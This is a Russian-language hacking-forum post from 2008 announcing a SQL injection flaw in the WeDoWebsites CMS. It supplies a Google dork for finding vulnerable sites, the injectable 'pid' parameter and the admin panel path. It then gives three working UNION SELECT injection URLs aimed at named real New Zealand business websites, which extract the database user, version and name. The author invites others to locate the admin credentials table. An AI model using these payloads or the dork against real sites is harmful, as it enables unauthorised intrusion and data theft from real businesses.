Тема: WeDoWebsites CMS Remote SQL Injection Vulnerability
Показать сообщение отдельно

WeDoWebsites CMS Remote SQL Injection Vulnerability
  #1  
Старый 04.01.2008, 08:33
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию WeDoWebsites CMS Remote SQL Injection Vulnerability
*******************WeDoWebsites Content Management System*******************

AUTHOR: Ded MustD!e
GOOGLE DORK: "Powered by a WeDoWebsites Content Management System"
LINK: http://www.wedowebsites.co.nz/
EXPLOIT: http://site.com/xxxxx.php?pid=[SQL-INJ]
DETAILS: колонок 6, а вот таблицу с данными админа я подобрать так и не смог, хотя префикс вроде не используется; админка: http://site.com/admin/
EXAMPLES:

Код:
http://www.whiteelephant.co.nz/abeltasmanbackpackers.php?pid=-1+union+select+1,2,3,4,conca   t_ws(0x3a,user(),version(),database()),6/*
Код:
http://www.vistadesign.co.nz/landscapedesigners.php?pid=-1+union+select+1,2,concat_ws(0x3a,   user(),version(),database()),4,5,6/*
Код:
http://www.villaonthebay.co.nz/holidayhomegallery.php?pid=-1+union+select+1,2,3,4,concat_ws(   0x3a,user(),version(),database()),6/*
P.S. А вообще в гугле 5 страниц с примерами . Если кто-нибудь подберет таблицу, напишите сюда или мне в ПМ, буду благодарен.

************************************************** *************************
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием